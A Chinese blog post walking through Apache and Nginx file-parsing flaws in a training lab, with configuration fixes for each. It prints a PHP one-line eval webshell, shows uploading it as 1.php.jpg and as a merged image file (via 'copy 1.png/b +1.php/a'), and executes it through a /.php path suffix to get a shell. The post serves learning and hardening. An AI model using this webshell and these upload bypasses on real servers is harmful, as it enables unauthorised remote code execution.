apache 设置404 页面_Apache和Nginx解析漏洞

最新推荐文章于 2024-04-12 00:29:12 发布
最新推荐文章于 2024-04-12 00:29:12 发布
阅读量188 收藏
点赞数
文章标签: apache 设置404 页面 apache不能解析php文件 vb 解析ini文件 下列哪个是nginx解析漏洞会解析为php的文件 查看apache版本

先来玩Apache解析漏洞,安界网的靶场。

67fd19352a33dbaae142a0a0ff96109e.png

漏洞原理

Apache 解析文件的规则是从右到左开始判断解析,如果后缀名为不可识别文件解析,就再往左判断。比如 test.php.owf.rar “.owf”和”.rar” 这两种后缀是apache不可识别解析,apache就会把test.php.owf.rar解析成php。

其余配置问题导致漏洞

(1)如果在 Apache 的 conf 里有这样一行配置 AddHandler php5-script .php 这时只要文件名里包含.php 即使文件名是 test2.php.jpg 也会以 php 来执行。
(2)如果在 Apache 的 conf 里有这样一行配置 AddType application/x-httpd-php .jpg 即使扩展名是 jpg,一样能以 php 方式执行。

  • 1

  • 2

漏洞利用

打开靶场a463a7496ef0b4da20db617c3bdac1f4.png
首先制作一个php一句话木马

<?php @eval($_POST[‘a’]); ?>

  • 1

56dd249c7bbe13c9c2a90c5969517bab.png
保存为1.php打开浏览器地址为192.168.0.2

cc46d2f0b88a7c76963630a23d910608.png
上传一句话后,提示禁止上传php

0f7205d3bbd39e93ee11c21cec87e86b.png
修改文件后缀名添加.jpg后缀,重新上传(1.php.jpg)

ed7aeac73db86d7ae8a42c13e0a61c68.png
上传成功,然后用菜刀连接一句话,成功getshella6f77cfb8a3b7965c415327be57aaa26.png

修复方案

apache配置文件,禁止.php.这样的文件执行,配置文件里面加入

<Files ~ “.(php.|php3.)”>
    Order Allow,Deny
    Deny from all
</Files>

  • 1

  • 2

  • 3

  • 4

用伪静态能解决这个问题,重写类似.php.*这类文件,打开apache的httpd.conf找到LoadModule rewrite_module modules/mod_rewrite.so
把#号去掉,重启apache,在网站根目录下建立.htaccess文件,代码如下:

<IfModule mod_rewrite.c>
RewriteEngine On
RewriteRule .(php.|php3.) /index.php
RewriteRule .(pHp.|pHp3.) /index.php
RewriteRule .(phP.|phP3.) /index.php
RewriteRule .(Php.|Php3.) /index.php
RewriteRule .(PHp.|PHp3.) /index.php
RewriteRule .(PhP.|PhP3.) /index.php
RewriteRule .(pHP.|pHP3.) /index.php
RewriteRule .(PHP.|PHP3.) /index.php
</IfModule>

  • 1

  • 2

  • 3

  • 4

  • 5

  • 6

  • 7

  • 8

  • 9

  • 10

  • 11

然后我们在来玩Nginx解析漏洞,前几天最新版的phpstduy中nginx1.15.11版本存在解析漏洞,那么我们这里用小皮搭建继续用安界网的源码吧!

漏洞原理

1.由于nginx.conf的如下配置导致nginx把以.php结尾的文件交给fastcgi处理,为此可以构造http://127.0.0.1/1.png/.php (url结尾不一定是.php,任何服务器端不存在的php文件均可,比如a.php),其中1.png是我们上传的包含PHP代码的照片文件。
2.但是fastcgi在处理.php文件时发现文件并不存在,这时php.ini配置文件中cgi.fix_pathinfo=1 发挥作用,这项配置用于修复路径,如果当前路径不存在则采用上层路径,为此这里交由fastcgi处理的文件就变成了/1.png
3.最重要的一点是php-fpm.conf中的security.limit_extensions配置项限制了fastcgi解析文件的类型(即指定什么类型的文件当做代码解析),此项设置为空的时候才允许fastcgi将.png等文件当做代码解。

漏洞利用

先搞一张图片和一个一句话木马a01ab1def9d3038d6e24e8c00d9fb766.png
然后打开图片和木马在的路径,输入融合命令接下来生成一个无敌的武器。

C:\Users\Administrator\Desktop\新建文件夹>copy 1.png/b +1.php/a 2.png

  • 1

ad79e0b4cc9e4d2737c5b09a6818d2cf.png
上传我们无敌的武器(图片马)14d581b015eedb7063b9d76c5faaab5d.png
上传成功,然后我们点击查看bc3a61a70a9fa71f2c5090f1f39ab1ed.png

http://127.0.0.1/2.png

  • 1

在图片路径添加/.php2be9f68f448857d6487709858e0c0bc6.png
图片已经以php执行了5d8e93ba8dc1a5a77e19f6327a114abc.png

修复方案

1、 将php.ini文件中的cgi.fix_pathinfo的值设置为0,这样php再解析1.png/1.php这样的目录时,只要1.php不存在就会显示404页面

2、 php-fpm.conf中的security.limit_extensions后面的值设置为.php

3、当出现新版本记得更新、打补丁

  • 1

  • 2

  • 3

  • 4

  • 5

总结

今天又是朴素切充实的一天啊!

585e70ead39eaa356950a52317dd4dd4.png

weixin_39608680
关注
Apache nginx解析漏洞复现
m0_56578216的博客
09-07 383
nginx解压后放到c盘根目录下:运行startup.bat启动环境:在HTML文件夹下有它的主页文件:在bp的浏览器输入10.9.75.164打开nginx:访问主页目录下的info.php文件可以正常访问:info.png该文件是一个图片马:尝试访问后不能显示:用bp抓包,发送到repeater模块,修改字段为info.png%00.php,发送后可以执行该图片马:nginx在遇到后缀名有php文件时,将该文件php解释器处理,在读取文件时如果遇到00时就读取结束,所以nginx将info.p
nginx反向代理负载均衡+Apache httpd换行解析漏洞
m0_56501091的博客
02-10 448
最后环境搭建不是很成功,下载参考并使用了一下别人的环境,然后在网页上是这样的: (成功了回来修改并加上没成功原因和排错过程)关掉其中一台机器,这种行为最不推荐,但如果你不在乎关掉服务器的损失当我没说。这种方法影响业务,不建议尝试,测试除外。既然无法预测下一次是哪台机器去执行,我们可以在Shell 执行 Payload 之前,判断要不要执行。反向代理方式其中比较流行的方式是用 nginx 来做负载均衡,下面是负载均衡的几种策略。,apache依然将其当成php解析,但是在上传文件时可以成功的绕过黑名单。
HTTP POST请求的Apache Rewrite规则设置
slvher的专栏
06-20 3742
最近自测后端模块时有个业务需求需要利用WebServer(我用的是Apache)将HTTP POST请求转发至后端C模块,后端处理后返回2进制加密数据。http post请求的url格式为:             http://demo-domain/myuri?param1=p1&param2=p2         由于myuri非php文件,故要借助Apache的rewrite功能将其“
58.网络安全渗透测试—[文件上传篇8] —[. htaccess重写解析漏洞-突破上传]
qwsn
08-08 2036
我认为,无论是学习安全还是从事安全的人,多多少少都有些许的情怀和使命感!!! 文章目录 一、. htaccess重写解析漏洞 1、重写解析漏洞的原理: 2、重写解析漏洞的利用:
解析漏洞
chaojixiaojingang
08-06 666
1.IIS6.0两个解析漏洞: (1)目录解析:在网站下建立文件夹的名字为 *.asp、*.asa 的文件夹,其目录内的任何扩展名的文件都被 IIS 当作 asp 文件解析并执行。例如创建目录 vidun.asp,那么 /vidun.asp/1.jpg 将被当作 asp 文件来执行。 (2)文件解析:网站上传图片的时候,将网页木马文件的名字改成“*.asp;.jpg”,也同样被 IIS 当作 ...
apache rewrite支持post数据
mengzuchao的专栏
06-06 2104
&lt;IfModule mod_rewrite.c&gt;    Options +FollowSymlinks    RewriteEngine On    # 包含api及media    RewriteCond %{REQUEST_FILENAME} "(api\.php|media\.php|Public)"    RewriteRule ^(.*)$ http://www.17byh....
apache rewrite 支持post 数据
weixin_30416871的博客
09-19 129
在rewriterule后加上参数[P] P表明force proxy,需要mod_proxy以及根据相应协议的proxy模块比如mod_http_proxy 实际上这个时候apache就充当了反向代理的功能。 “A reverse proxy is activated using the ProxyPass directive or the [P] flag to the RewriteR...
第八天Apache解析漏洞IIS 解析漏洞Nginx 解析漏洞文件上传%oo截断
代码审计
03-11 4762
这里写目录标题一级目录二级目录三级目录 一级目录 二级目录 三级目录 文件名后缀就一个%00字节,可以截断某些函数对文件名的判断。在许多语言函数中,处理字符串的函数中0x00被认为是终止符。 例如: 网站上传函数处理xxx.php%00.jpg时,首先后缀名是合法的jpg格式,可以上传,在保存文件时,遇到%00字符丢弃后面的jpg,文件后缀最终保存的后缀名为xxx.php ...
nginx常见漏洞解析_nginx漏洞
最新发布
2401_83947255的博客
04-12 1229
0×1HTTP返回包头:就是httpresponsHTTP返回包体:就是请求的具体文件,例如出来个网页资源,网页内嵌套的内容等等。自我介绍一下,小编13年上海交大毕业,曾经在小公司待过,也去过华为、OPPO等大厂,18年进入阿里一直到现在。深知大多数网络安全工程师,想要提升技能,往往是自己摸索成长,但自己不成体系的自学效果低效又漫长,而且极易碰到天花板技术停滞不前!因此收集整理了一份《2024年网络安全全套学习资料》,初衷也很简单,就是希望能够帮助到想自学提升又不知道该从何学起的朋友。
服务攻防-中间件安全&CVE复现&IIS&Apache&Tomcat&Nginx漏洞复现
ran的博客
05-13 2768
ISS中间件(Internet Security and Acceleration Server Middleware)是微软公司推出的一种安全中间件,旨在提供高效的安全代理服务和网络加速功能。它是Microsoft Proxy Server和Microsoft Firewall产品的继承者,也是Microsoft Forefront TMG(Threat Management Gateway)的前身。
nginx rewrite 伪静态配置参数详细说明
09-30
nginx rewrite 伪静态配置参数和使用例子 附正则使用说明
apachenginx 404 配置
小丁的专栏
03-27 1302
404设置有应用程序层面的,虚拟主机层面的,web服务器层面的 1.应用可以通过程序来控制,header('HTTP/1.1 404 Not Found');即可输出404错误,略过 2.虚拟主机上的apachenginx配置分别如下:     apache在里添加:ErrorDocument 404 http://www.xxx.com/example404.php     ngin
tp5伪静态无法生成html,tp5从本地Apache环境转到服务器Nginx环境后404问题的伪静态设置...
weixin_30953203的博客
06-07 241
昨天写了一个简单的json格式输出数据本地运行一切正常,上传到服务器之后除了根域名外其他路由全部404各种百度弄了一晚上各种改配置文件也没弄好(本人小白)后来从宝塔面板上看到了这么个东西点进去发现是Apache伪静态规则转换Nginx….把本地的.htaccess文件内的所有内容复制到这个框框里点击转换RewriteEngine onRewriteCond %{REQUEST_FILENAME} ...
Apache设置404错误页面
weixin_34072159的博客
12-11 518
在JSP网站开发中,在用户访问网站出错、找不到页面时,出现HTTP 404,403错误信息,为了提高用户体验,我们需要自定义404、403错误页面,提示用户下一步操作或自动跳转至合适的访问页面。  自定义错误页面404、403的方法,主要通过apache或者htaccess进行配置,htaccess配置错误页面的方法适合虚拟主机用 户。下面详细介绍错误页面404、403的配...
nginxapache的伪静态
帆酱的博客
09-29 339
nginx location / { #将地址末尾添加.php后缀 try_files $uri $uri/ $uri.php?$args; } 例:访问:https://test.weblf.cn/haha/hehe/demo?id=3 实际访问:https://test.weblf.cn/haha/hehe/demo.php?id=3
PHP网站从Apache转移到Nginx后产生404错误的原因和解决办法
sunsineq的专栏
12-12 602
PHP网站从Apache转移到Nginx后产生404错误的原因和解决办法 原文地址链接:http://www.linuxidc.com/Linux/2014-06/103103.htm 原案例分析: 1、原来的网站在wamp环境下搭建完成,一切正常,上传到虚拟主机环境为lnmp,结果访问时可以打开主页,然后点其他页面全部报404错误; 2、经分析得出原因:原网站环境为wamp使用了伪静态,伪静态规则写在网站根目录的.htaccess文件中,Apache下默认识别此文件内容,而Nginx服务器不.
apache 支持cgi 的问题快被搞疯了
木子三水的专栏
11-04 1757
by:c1      apache安装查看:http://blog.csdn.net/sanshuei/article/details/8146249   1. 配置/etc/httpd/httpd.conf LoadModule cgi_module modules/mod_cgi.so       # 去掉该行前面#号,确认配置中已添加cgi模块,并apache2/module
phpapache整合404,将PHP-FPM与Apache一起使用时自定义404消息
weixin_42484898的博客
03-28 162
我有Apache(2.2.22在Debian上)配置为通过FastCGI处理PHP文件:SetHandler application/x-httpd-phpAction application/x-httpd-php /fcgi-bin/php5-fpm virtual Alias/fcgi-bin/php5-fpm /fcgi-bin-php5-fpm FastCgiExternalServer...
linux apache 404配置文件,apache httpd服务器404错误跳转配置教程
weixin_34096605的博客
05-01 1377
apache httpd服务器404配置是至关重要的,实现404错误页面跳转非常重要,通常情况下我喜欢在项目根目录下新建一个“.htaccess”重定向配置文件,这种方式是最简单的,我们可以在里面加入如下代码:ErrorDocument404/404.html如果想在apache服务器发生404错误的时候跳转到index网站首页,则可以将上方的代码改成如下这样即可:ErrorDocument...
简述ApacheNginx、IIS中间件 存在哪些解析漏洞
03-25
这些中间件在处理网络数据流时都可能出现解析漏洞,下面简述它们可能存在的漏洞: 1. Apache:常见的解析漏洞包括:路径穿越漏洞、HTTP请求拆分漏洞、HTTP请求头注入漏洞、HTTP请求参数污染漏洞等。 2. Nginx:...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值